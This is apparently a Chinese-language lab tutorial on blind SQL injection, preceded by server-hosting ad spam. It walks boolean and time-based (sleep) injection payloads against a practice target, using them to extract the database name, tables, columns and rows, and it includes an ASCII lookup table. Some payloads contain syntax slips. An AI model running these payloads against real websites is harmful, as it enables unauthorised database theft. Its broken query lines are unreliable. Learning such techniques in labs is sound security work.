蓝易云高性能服务器
|
|
|
|
|
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
|
|
|
|
|
布尔注入
猜库位
我们还是通过墨者里面的靶场来进行布尔注入
首先我们一样
要发现他是存在注入点的
and 1=2
那么判断字段呢可以先放下先
我们判断出他存在注入点
那么下面就是猜的库名
怎么猜呢
我们布尔注入是先猜他的库名是几个字母几个特殊字符的
and length(database())=23
假设我们的当时数据库的
库名为
bezr
那么我们的注入语句就是
and length(database())=4
这个语句的意思是
我猜他的库名为四个字母或者说我猜他的库名为四个特殊字符,再或者说我猜他的库名占四位
那么我们这样去注入的话
他是正常显示的
并不会报错或者异常回显
因为我们猜的是正确的
使用是正常回显
如果猜的是错误的
比如
and length(database())=9
这就错误了
因为我们的库名是4位的
现在猜9位所有是错误的,所以报错
这就是我们在逻辑上的猜库名有几位‘
猜库位的字母或者特殊字符
and left(database(),1)='m'
这个就是猜库名的
第一位的第一个字母,或者是第一个特殊字符他等于那个
他是等于m的
那么如果我们猜错了他会异常回显
或者不显示
那么如果我们猜对了
他的回显就是正常的
如果说你要猜第二位置上的是什么
也一样
and left(database(),2)='o'
猜表的数量
and 1>2 or (select count(*) from information_schema.tables where table_schema=database())='2'
and 1=2 or (select count(*) from information_schema.tables where table_schema=database())='2'
猜第表有几位
and 1>2 or length((select table_name from information_schema.tables where table_schema=database()limit)0,1))='17'
and 1=2 or length((select table_name from information_schema.tables where table_schema=database()limit)0,1))='17'
猜表的第一个字母或者第一个特殊字符
and ascii(substr((select table_name from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"limit 0,1),1,1))=83
二进制 | 十进制 | 十六进制 | 字符/缩写 | 解释 |
---|---|---|---|---|
00000000 | 0 | 00 | NUL (NULL) | 空字符 |
00000001 | 1 | 01 | SOH (Start Of Headling) | 标题开始 |
00000010 | 2 | 02 | STX (Start Of Text) | 正文开始 |
00000011 | 3 | 03 | ETX (End Of Text) | 正文结束 |
00000100 | 4 | 04 | EOT (End Of Transmission) | 传输结束 |
00000101 | 5 | 05 | ENQ (Enquiry) | 请求 |
00000110 | 6 | 06 | ACK (Acknowledge) | 回应/响应/收到通知 |
00000111 | 7 | 07 | BEL (Bell) | 响铃 |
00001000 | 8 | 08 | BS (Backspace) | 退格 |
00001001 | 9 | 09 | HT (Horizontal Tab) | 水平制表符 |
00001010 | 10 | 0A | LF/NL(Line Feed/New Line) | 换行键 |
00001011 | 11 | 0B | VT (Vertical Tab) | 垂直制表符 |
00001100 | 12 | 0C | FF/NP (Form Feed/New Page) | 换页键 |
00001101 | 13 | 0D | CR (Carriage Return) | 回车键 |
00001110 | 14 | 0E | SO (Shift Out) | 不用切换 |
00001111 | 15 | 0F | SI (Shift In) | 启用切换 |
00010000 | 16 | 10 | DLE (Data Link Escape) | 数据链路转义 |
00010001 | 17 | 11 | DC1/XON (Device Control 1/Transmission On) | 设备控制1/传输开始 |
00010010 | 18 | 12 | DC2 (Device Control 2) | 设备控制2 |
00010011 | 19 | 13 | DC3/XOFF (Device Control 3/Transmission Off) | 设备控制3/传输中断 |
00010100 | 20 | 14 | DC4 (Device Control 4) | 设备控制4 |
00010101 | 21 | 15 | NAK (Negative Acknowledge) | 无响应/非正常响应/拒绝接收 |
00010110 | 22 | 16 | SYN (Synchronous Idle) | 同步空闲 |
00010111 | 23 | 17 | ETB (End of Transmission Block) | 传输块结束/块传输终止 |
00011000 | 24 | 18 | CAN (Cancel) | 取消 |
00011001 | 25 | 19 | EM (End of Medium) | 已到介质末端/介质存储已满/介质中断 |
00011010 | 26 | 1A | SUB (Substitute) | 替补/替换 |
00011011 | 27 | 1B | ESC (Escape) | 逃离/取消 |
00011100 | 28 | 1C | FS (File Separator) | 文件分割符 |
00011101 | 29 | 1D | GS (Group Separator) | 组分隔符/分组符 |
00011110 | 30 | 1E | RS (Record Separator) | 记录分离符 |
00011111 | 31 | 1F | US (Unit Separator) | 单元分隔符 |
00100000 | 32 | 20 | (Space) | 空格 |
00100001 | 33 | 21 | ! | |
00100010 | 34 | 22 | " | |
00100011 | 35 | 23 | # | |
00100100 | 36 | 24 | $ | |
00100101 | 37 | 25 | % | |
00100110 | 38 | 26 | & | |
00100111 | 39 | 27 | ’ | |
00101000 | 40 | 28 | ( | |
00101001 | 41 | 29 | ) | |
00101010 | 42 | 2A | * | |
00101011 | 43 | 2B | + | |
00101100 | 44 | 2C | , | |
00101101 | 45 | 2D | - | |
00101110 | 46 | 2E | . | |
00101111 | 47 | 2F | / | |
00110000 | 48 | 30 | 0 | |
00110001 | 49 | 31 | 1 | |
00110010 | 50 | 32 | 2 | |
00110011 | 51 | 33 | 3 | |
00110100 | 52 | 34 | 4 | |
00110101 | 53 | 35 | 5 | |
00110110 | 54 | 36 | 6 | |
00110111 | 55 | 37 | 7 | |
00111000 | 56 | 38 | 8 | |
00111001 | 57 | 39 | 9 | |
00111010 | 58 | 3A | : | |
00111011 | 59 | 3B | ; | |
00111100 | 60 | 3C | < | |
00111101 | 61 | 3D | = | |
00111110 | 62 | 3E | > | |
00111111 | 63 | 3F | ? | |
01000000 | 64 | 40 | @ | |
01000001 | 65 | 41 | A | |
01000010 | 66 | 42 | B | |
01000011 | 67 | 43 | C | |
01000100 | 68 | 44 | D | |
01000101 | 69 | 45 | E | |
01000110 | 70 | 46 | F | |
01000111 | 71 | 47 | G | |
01001000 | 72 | 48 | H | |
01001001 | 73 | 49 | I | |
01001010 | 74 | 4A | J | |
01001011 | 75 | 4B | K | |
01001100 | 76 | 4C | L | |
01001101 | 77 | 4D | M | |
01001110 | 78 | 4E | N | |
01001111 | 79 | 4F | O | |
01010000 | 80 | 50 | P | |
01010001 | 81 | 51 | Q | |
01010010 | 82 | 52 | R | |
01010011 | 83 | 53 | S | |
01010100 | 84 | 54 | T | |
01010101 | 85 | 55 | U | |
01010110 | 86 | 56 | V | |
01010111 | 87 | 57 | W | |
01011000 | 88 | 58 | X | |
01011001 | 89 | 59 | Y | |
01011010 | 90 | 5A | Z | |
01011011 | 91 | 5B | [ | |
01011100 | 92 | 5C | \ | |
01011101 | 93 | 5D | ] | |
01011110 | 94 | 5E | ^ | |
01011111 | 95 | 5F | _ | |
01100000 | 96 | 60 | ` | |
01100001 | 97 | 61 | a | |
01100010 | 98 | 62 | b | |
01100011 | 99 | 63 | c | |
01100100 | 100 | 64 | d | |
01100101 | 101 | 65 | e | |
01100110 | 102 | 66 | f | |
01100111 | 103 | 67 | g | |
01101000 | 104 | 68 | h | |
01101001 | 105 | 69 | i | |
01101010 | 106 | 6A | j | |
01101011 | 107 | 6B | k | |
01101100 | 108 | 6C | l | |
01101101 | 109 | 6D | m | |
01101110 | 110 | 6E | n | |
01101111 | 111 | 6F | o | |
01110000 | 112 | 70 | p | |
01110001 | 113 | 71 | q | |
01110010 | 114 | 72 | r | |
01110011 | 115 | 73 | s | |
01110100 | 116 | 74 | t | |
01110101 | 117 | 75 | u | |
01110110 | 118 | 76 | v | |
01110111 | 119 | 77 | w | |
01111000 | 120 | 78 | x | |
01111001 | 121 | 79 | y | |
01111010 | 122 | 7A | z | |
01111011 | 123 | 7B | { | |
01111100 | 124 | 7C | | | |
01111101 | 125 | 7D | } | |
01111110 | 126 | 7E | ~ | |
01111111 | 127 | 7F | DEL (Delete) | 删除 |
猜字段名字
and ascii(substr((select column_name from information_schema.columns
where table_name=‘获取到的表名’ and table_schema=‘获取到的数据库名’ limit
0,1),第一个位置,1))>97
and ascii(substr((select column_name from information_schema.columns where table_name='StormGroup_member' and table_schema='mozhe_Discuz_StormGroup' limit 0,1),1,1))>104
猜值
and ascii(substr((select concat(字段名) from 数据库名.表名limit 0,1),1,1))>108
and ascii(substr((select concat(name) from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1),1,1))>108
延时注入
延时注入很简单
就是延长了时间
进行回显
and if(1=1,sleep(5),0)
用时6.92秒
那么我们现在延时五秒
那么在什么情况下会延时5秒呢
那就是在正确的情况下了
就是你猜的正确的情况下,他就会执行你的要求,你的要求就是延迟5秒或者更久的时间
最后时间是
11秒多
那么11-6等于5
那么就是延迟了5秒
说明我猜的是正确的
延时注入判断数据库名长度
and if(length(database())=23,sleep(10),1)
and if(length(database())=你猜他的库名是多少位,sleep(延迟多少秒),第一个数据库名)
17秒
这个秒数呢虽然不是非常准确
但是凭感觉就知道是不是正确的了
mozhe_Discuz_StormGroup
延时注入判断当前数据库名
and if(ascii(substr(database(),1,1))=ascii值,1,sleep(延时多少))
and if(ascii(substr(database(),1,0))=109,1,sleep(10))
延时注入判断表名
and if((select ascii(substr((select table_name from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"limit 0,1),1,1)))='105',sleep(30),0)
参考一下吧
猜字段语句:
?id=1' and if((select ascii(substr((select column_name from information_schema.columns where table_name="表名"limit 0,1),N,1)))=101,0,sleep(5))-- -
猜数据:
and if((select ascii(substr((select 字段名 from 库名.表名 limit 0,1),N,1)))=101,0,sleep(5))